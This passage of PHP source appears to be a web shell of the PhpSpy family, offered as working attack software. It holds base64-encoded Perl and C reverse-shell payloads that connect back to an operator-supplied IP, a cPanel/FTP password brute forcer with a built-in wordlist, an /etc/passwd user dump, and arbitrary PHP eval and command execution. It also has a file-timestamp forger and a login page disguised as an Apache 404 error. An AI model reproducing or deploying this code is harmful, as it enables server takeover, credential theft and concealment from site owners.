				}
				$data_size = sizecount($data_size);
				unset($table);
				p('<table border="0" cellpadding="0" cellspacing="0">');
				p('<form action="'.$self.'" method="POST">');
				makehide('action','sqladmin');
				p($dbform);
				p('<tr class="head">');
				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
				p('<td>Name</td>');
				p('<td>Rows</td>');
				p('<td>Data_length</td>');
				p('<td>Create_time</td>');
				p('<td>Update_time</td>');
				if ($highver) {
					p('<td>Engine</td>');
					p('<td>Collation</td>');
				}
				p('</tr>');
				foreach ($tabledb as $key => $table) {
					$thisbg = bg();
					p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
					p('<td>'.$table['Rows'].'</td>');
					p('<td>'.$table['Data_length'].'</td>');
					p('<td>'.$table['Create_time'].'</td>');
					p('<td>'.$table['Update_time'].'</td>');
					if ($highver) {
						p('<td>'.$table['Engine'].'</td>');
						p('<td>'.$table['Collation'].'</td>');
					}
					p('</tr>');
				}
				p('<tr class=fout>');
				p('<td>&nbsp;</td>');
				p('<td>Total tables: '.$table_num.'</td>');
				p('<td>'.$table_rows.'</td>');
				p('<td>'.$data_size.'</td>');
				p('<td colspan="'.($highver ? 4 : 2).'">&nbsp;</td>');
				p('</tr>');

				p("<tr class=\"fout\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
				makehide('doing','backupmysql');
				formfoot();
				p("</table>");
				fr($query);
			}
		}
	}
	tbfoot();
	@mysql_close();
}//end sql backup


elseif ($action == 'backconnect') {
	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
	!$yourport && $yourport = '12345';
	$usedb = array('perl'=>'perl','c'=>'c');

	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

	if ($start && $yourip && $yourport && $use){
		if ($use == 'perl') {
			cf('/tmp/angel_bc',$back_connect);
			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
		} else {
			cf('/tmp/angel_bc.c',$back_connect_c);
			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
			@unlink('/tmp/angel_bc.c');
			$res = execute("/tmp/angel_bc $yourip $yourport &");
		}
		m("Now script try connect to $yourip port $yourport ...");
	}

	formhead(array('title'=>'Back Connect'));
	makehide('action','backconnect');
	p('<p>');
	p('Your IP:');
	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
	p('Your Port:');
	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
	p('Use:');
	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
	p('</p>');
	formfoot();
}//end backconnect window via NC

// Brute
elseif ($action == 'brute') {
formhead(array('title'=>'Brute Forcer'));
	makehide('action','brute');
	makehide('dir',$brute);
@ini_set('memory_limit', 1000000000000);
$connect_timeout=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$users = $_REQUEST['users'];
$pass = $_REQUEST['passwords'];
$target = $_REQUEST['target'];
$option = $_REQUEST['option'];


$passlist = "0123456
01234567
012345678
0123456789
01234567890
123456
1234567
12345678
123456789
1234567890
111111
000000
222222
333333
444444
555555
666666
777777
888888
999999
123123
456456
789789
123321
456654
654321
7654321
87654321
987654321
0987654321
admin
administrator
admincp
cpanel
adminx
admins
password
passwords
passw0rd
p@ssw0rd
p@ssword
khongco
25251325
passw0rds";
if($target == ''){
$target = 'localhost';
}
print " <div align='center'>
<form method='post' style='border: 1px solid #000000'><br><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
<b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
<div align='center'><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
<tr>
<td align='center'>
<b>Username</b></td>
<td>
<p align='center'>
<b>Password</b></td>
</tr>
</table>
<p align='center'>
<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
$i = 0;
while ($i < 60000) {

    $line = posix_getpwuid($i);
    if (!empty($line)) {

        while (list ($key, $vba_etcpwd) = each($line)){
            echo "".$vba_etcpwd."\n";
            break;
        }

    }

   $i++;
}
echo "
</textarea>
<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
<br>
<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
</td></tr></table></td></tr></form><p align= 'left'>";
?>
<?php
function ftp_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {

print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
exit;}

elseif ( curl_errno($ch) == 0 ){

p("<b>[ attack@vbateam.net ]# </b>
<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
}
curl_close($ch);}

function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){

p("<b>[ attack@vbateam.net ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");}curl_close($ch);}

if(isset($submit) && !empty($submit)){

$userlist = explode ("\n" , $users );
$passlist = explode ("\n" , $pass );
p('<b>[ attack@vbateam.net ]# Attacking ...</font></b><br>');
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password ) {
$_pass = trim($password);
if($option == "ftp"){
ftp_check($target,$_user,$_pass,$connect_timeout);
}
if ($option == "cpanel")
{
cpanel_check($target,$_user,$_pass,$connect_timeout);
}
}
}
}

	formfoot();
}






elseif ($action == 'etcpwd') {
formhead(array('title'=>'Get /etc/passwd'));
	makehide('action','etcpwd');
	makehide('dir',$nowpath);
$i = 0;
 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
while ($i < 60000) {

    $line = posix_getpwuid($i);
    if (!empty($line)) {

        while (list ($key, $vba_etcpwd) = each($line)){
            echo "".$vba_etcpwd."\n";
            break;
        }

    }

   $i++;
}
  echo "</textarea></p>";
	formfoot();
}

elseif ($action == 'eval') {
	$phpcode = trim($phpcode);
	if($phpcode){
		if (!preg_match('#<\?#si', $phpcode)) {
			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
		}
		eval("?".">$phpcode<?");
	}
	formhead(array('title'=>'Eval PHP Code'));
	makehide('action','eval');
	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
	p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
	formfooter();
}//end eval

elseif ($action == 'editfile') {
	if(file_exists($opfile)) {
		$fp=@fopen($opfile,'r');
		$contents=@fread($fp, filesize($opfile));
		@fclose($fp);
		$contents=htmlspecialchars($contents);
	}
	formhead(array('title'=>'Create / Edit File'));
	makehide('action','file');
	makehide('dir',$nowpath);
	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
	formfooter();
}//end editfile

elseif ($action == 'newtime') {
	$opfilemtime = @filemtime($opfile);
	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
	formhead(array('title'=>'Clone file was last modified time'));
	makehide('action','file');
	makehide('dir',$nowpath);
	makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
	makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
	formfooter();
	formhead(array('title'=>'Set last modified'));
	makehide('action','file');
	makehide('dir',$nowpath);
	makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
	p('<p>Instead &raquo;');
	p('year:');
	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
	p('month:');
	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
	p('day:');
	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
	p('hour:');
	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
	p('minute:');
	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
	p('second:');
	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
	p('</p>');
	formfooter();
}//end newtime

elseif ($action == 'shell') {
	if (IS_WIN && IS_COM) {
		if($program && $parameter) {
			$shell= new COM('Shell.Application');
			$a = $shell->ShellExecute($program,$parameter);
			m('Program run has '.(!$a ? 'success' : 'fail'));
		}
		!$program && $program = 'c:\windows\system32\cmd.exe';
		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
		formhead(array('title'=>'Execute Program'));
		makehide('action','shell');
		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
		p('<p>');
		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
		p('</p>');
		formfoot();
	}
	formhead(array('title'=>'Execute Command'));
	makehide('action','shell');
	if (IS_WIN && IS_COM) {
		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
	}
	p('<p>');
	makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
	p('</p>');
	formfoot();

	if ($command) {
		p('<hr width="100%" noshade /><pre>');
		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
			$wsh = new COM('WScript.shell');
			$exec = $wsh->exec('cmd.exe /c '.$command);
			$stdout = $exec->StdOut();
			$stroutput = $stdout->ReadAll();
			echo $stroutput;
		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
			$descriptorspec = array(
			   0 => array('pipe', 'r'),
			   1 => array('pipe', 'w'),
			   2 => array('pipe', 'w')
			);
			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
			if (is_resource($process)) {
				fwrite($pipes[0], $command."\r\n");
				fwrite($pipes[0], "exit\r\n");
				fclose($pipes[0]);
				while (!feof($pipes[1])) {
					echo fgets($pipes[1], 1024);
				}
				fclose($pipes[1]);
				while (!feof($pipes[2])) {
					echo fgets($pipes[2], 1024);
				}
				fclose($pipes[2]);
				proc_close($process);
			}
		} else {
			echo(execute($command));
		}
		p('</pre>');
	}
}//end shell

elseif ($action == 'phpenv') {
	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
	!$dis_func && $dis_func = 'No';
	$info = array(
		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
		4 => array('Server OS',PHP_OS),
		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
		8 => array('PHP run mode',strtoupper(php_sapi_name())),
		9 => array('The file path',__FILE__),

		10 => array('PHP Version',PHP_VERSION),
		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
		12 => array('Safe Mode',getcfg('safe_mode')),
		13 => array('Administrator',$adminmail),
		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
		15 => array('enable_dl',getcfg('enable_dl')),
		16 => array('display_errors',getcfg('display_errors')),
		17 => array('register_globals',getcfg('register_globals')),
		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
		19 => array('memory_limit',getcfg('memory_limit')),
		20 => array('post_max_size',getcfg('post_max_size')),
		21 => array('upload_max_filesize',$upsize),
		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
		23 => array('disable_functions',$dis_func),
	);

	if($phpvarname) {
		m($phpvarname .' : '.getcfg($phpvarname));
	}

	formhead(array('title'=>'Server environment'));
	makehide('action','phpenv');
	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
	formfooter();

	$hp = array(0=> 'Server', 1=> 'PHP');
	for($a=0;$a<2;$a++) {
		p('<h2>'.$hp[$a].' &raquo;</h2>');
		p('<ul class="info">');
		if ($a==0) {
			for($i=1;$i<=9;$i++) {
				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
			}
		} elseif ($a == 1) {
			for($i=10;$i<=23;$i++) {
				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
			}
		}
		p('</ul>');
	}
}//end phpenv

else {
	m('Undefined Action');
}

?>
</td></tr></table>
<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
	<B>The Legend of Vietnamese Hacker World</B> All Rights Reserved.
</div>
</body>
</html>

<?php

/*======================================================
Show info shell
======================================================*/

function m($msg) {
	echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
	echo $msg;
	echo '</div>';
}
function scookie($key, $value, $life = 0, $prefix = 1) {
	global $admin, $timestamp, $_SERVER;
	$key = ($prefix ? $admin['cookiepre'] : '').$key;
	$life = $life ? $life : $admin['cookielife'];
	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
	setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
}
function multi($num, $perpage, $curpage, $tablename) {
	$multipage = '';
	if($num > $perpage) {
		$page = 10;
		$offset = 5;
		$pages = @ceil($num / $perpage);
		if($page > $pages) {
			$from = 1;
			$to = $pages;
		} else {
			$from = $curpage - $offset;
			$to = $curpage + $page - $offset - 1;
			if($from < 1) {
				$to = $curpage + 1 - $from;
				$from = 1;
				if(($to - $from) < $page && ($to - $from) < $pages) {
					$to = $page;
				}
			} elseif($to > $pages) {
				$from = $curpage - $pages + $to;
				$to = $pages;
				if(($to - $from) < $page && ($to - $from) < $pages) {
					$from = $pages - $page + 1;
				}
			}
		}
		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
		for($i = $from; $i <= $to; $i++) {
			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
		}
		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
	}
	return $multipage;
}
// Login page
function loginpage() {
?>

<html> <title>404 Not Found</title> <h1>Not Found</h1>  <p>The requested URL / was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr>  <address>Apache Server at  Port 80</address>      <style>          input { margin:0;background-color:#fff;border:1px solid #fff; }      </style>  <center> <form method="POST" action="">     <span style="font:10pt tahoma;"></span><input name="password" type="password" size="20">     <input type="hidden" name="doing" value="login">     </form> </center> 	</html> 
<?php
	exit;

}//end loginpage()

function execute($cfe) {
	$res = '';
	if ($cfe) {
		if(function_exists('exec')) {
			@exec($cfe,$res);
			$res = join("\n",$res);
		} elseif(function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
		} elseif(function_exists('system')) {
			@ob_start();
			@system($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif(function_exists('passthru')) {
			@ob_start();
			@passthru($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif(@is_resource($f = @popen($cfe,"r"))) {
			$res = '';
			while(!@feof($f)) {
				$res .= @fread($f,1024);
			}
			@pclose($f);
		}
	}
	return $res;
}
function which($pr) {
	$path = execute("which $pr");
	return ($path ? $path : $pr);
}

function cf($fname,$text){
	if($fp=@fopen($fname,'w')) {
		@fputs($fp,@base64_decode($text));
		@fclose($fp);
	}
}

// Debug
function debuginfo() {
	global $starttime;
	$mtime = explode(' ', microtime());
	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
	echo 'Processed in '.$totaltime.' second(s)';
}

// Function connect database
function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
		p('<h2>Can not connect to MySQL server</h2>');
		exit;
	}
	if($link && $dbname) {
		if (!@mysql_select_db($dbname, $link)) {
			p('<h2>Database selected has error</h2>');
			exit;
		}
	}
	if($link && mysql_get_server_info() > '4.1') {
		if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
		}
	}
	return $link;
}

// Array strip
function s_array(&$array) {
	if (is_array($array)) {
		foreach ($array as $k => $v) {
			$array[$k] = s_array($v);
		}
	} else if (is_string($array)) {
		$array = stripslashes($array);
	}
	return $array;
}

// HTML Strip
function html_clean($content) {
	$content = htmlspecialchars($content);
	$content = str_replace("\n", "<br />", $content);
	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
	return $content;
}

// Chmod
function getChmod($filepath){
	return substr(base_convert(@fileperms($filepath),10,8),-4);
}

function getPerms($filepath) {
	$mode = @fileperms($filepath);
	if (($mode & 0xC000) === 0xC000) {$type = 's';}
	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
	elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
	else {$type = '?';}

	$owner['read'] = ($mode & 00400) ? 'r' : '-';
	$owner['write'] = ($mode & 00200) ? 'w' : '-';
	$owner['execute'] = ($mode & 00100) ? 'x' : '-';
	$group['read'] = ($mode & 00040) ? 'r' : '-';
	$group['write'] = ($mode & 00020) ? 'w' : '-';
	$group['execute'] = ($mode & 00010) ? 'x' : '-';
	$world['read'] = ($mode & 00004) ? 'r' : '-';
	$world['write'] = ($mode & 00002) ? 'w' : '-';
	$world['execute'] = ($mode & 00001) ? 'x' : '-';

	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}

	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
}

function getUser($filepath)	{
	if (function_exists('posix_getpwuid')) {
		$array = @posix_getpwuid(@fileowner($filepath));
		if ($array && is_array($array)) {
			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
		}
	}
	return '';
}

// Delete dir
function deltree($deldir) {
	$mydir=@dir($deldir);
	while($file=$mydir->read())	{
		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
			@chmod($deldir.'/'.$file,0777);
			deltree($deldir.'/'.$file);
		}
		if (is_file($deldir.'/'.$file)) {
			@chmod($deldir.'/'.$file,0777);
			@unlink($deldir.'/'.$file);
		}
	}
	$mydir->close();
	@chmod($deldir,0777);
	return @rmdir($deldir) ? 1 : 0;
}

// Background
function bg() {
	global $bgc;
	return ($bgc++%2==0) ? 'alt1' : 'alt2';
}

// Get path
function getPath($scriptpath, $nowpath) {
	if ($nowpath == '.') {
		$nowpath = $scriptpath;
	}
	$nowpath = str_replace('\\', '/', $nowpath);
	$nowpath = str_replace('//', '/', $nowpath);
	if (substr($nowpath, -1) != '/') {
		$nowpath = $nowpath.'/';
	}
	return $nowpath;
}

// Get up path
function getUpPath($nowpath) {
	$pathdb = explode('/', $nowpath);
	$num = count($pathdb);
	if ($num > 2) {
		unset($pathdb[$num-1],$pathdb[$num-2]);
	}
	$uppath = implode('/', $pathdb).'/';
	$uppath = str_replace('//', '/', $uppath);
	return $uppath;
}

// Config
function getcfg($varname) {
	$result = get_cfg_var($varname);
	if ($result == 0) {
		return 'No';
	} elseif ($result == 1) {
		return 'Yes';
	} else {
		return $result;
	}
}

// Function name
function getfun($funName) {
	return (false !== function_exists($funName)) ? 'Yes' : 'No';
}

function GetList($dir){
	global $dirdata,$j,$nowpath;
	!$j && $j=1;
	if ($dh = opendir($dir)) {
		while ($file = readdir($dh)) {
			$f=str_replace('//','/',$dir.'/'.$file);
			if($file!='.' && $file!='..' && is_dir($f)){
				if (is_writable($f)) {
					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
					$dirdata[$j]['dirchmod']=getChmod($f);
					$dirdata[$j]['dirperm']=getPerms($f);
					$dirdata[$j]['dirlink']=ue($dir);
					$dirdata[$j]['server_link']=$f;
					$dirdata[$j]['client_link']=ue($f);
					$j++;
				}
				GetList($f);
			}
		}
		closedir($dh);
		clearstatcache();
		return $dirdata;
	} else {
		return array();
	}
}

function qy($sql) {
	//echo $sql.'<br>';
	$res = $error = '';
	if(!$res = @mysql_query($sql)) {
		return 0;
	} else if(is_resource($res)) {
		return 1;
	} else {
		return 2;
	}
	return 0;
}

function q($sql) {
	return @mysql_query($sql);
}

function fr($qy){
	mysql_free_result($qy);
}

function sizecount($size) {
	if($size > 1073741824) {
		$size = round($size / 1073741824 * 100) / 100 . ' G';
	} elseif($size > 1048576) {
		$size = round($size / 1048576 * 100) / 100 . ' M';
	} elseif($size > 1024) {
		$size = round($size / 1024 * 100) / 100 . ' K';
	} else {
		$size = $size . ' B';
	}
	return $size;
}

// Zip
class PHPZip{
	var $out='';
	function PHPZip($dir)	{
		if (@function_exists('gzcompress'))	{
			$curdir = getcwd();
			if (is_array($dir)) $filelist = $dir;
			else{
				$filelist=$this -> GetFileList($dir);//File list
				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
			}
			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
			else chdir($curdir);
			if (count($filelist)>0){
				foreach($filelist as $filename){
					if (is_file($filename)){
						$fd = fopen ($filename, 'r');
						$content = @fread ($fd, filesize($filename));
						fclose ($fd);
						if (is_array($dir)) $filename = basename($filename);
						$this -> addFile($content, $filename);
					}
				}
				$this->out = $this -> file();
				chdir($curdir);
			}
			return 1;
		}
		else return 0;
	}

	// Show file list
	function GetFileList($dir){
		static $a;
		if (is_dir($dir)) {
			if ($dh = opendir($dir)) {
				while ($file = readdir($dh)) {
					if($file!='.' && $file!='..'){
						$f=$dir .'/'. $file;
						if(is_dir($f)) $this->GetFileList($f);
						$a[]=$f;
					}
				}
				closedir($dh);
			}
		}
		return $a;
	}

	var $datasec      = array();
	var $ctrl_dir     = array();
	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
	var $old_offset   = 0;

	function unix2DosTime($unixtime = 0) {
		$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
		if ($timearray['year'] < 1980) {
			$timearray['year']    = 1980;
			$timearray['mon']     = 1;
			$timearray['mday']    = 1;
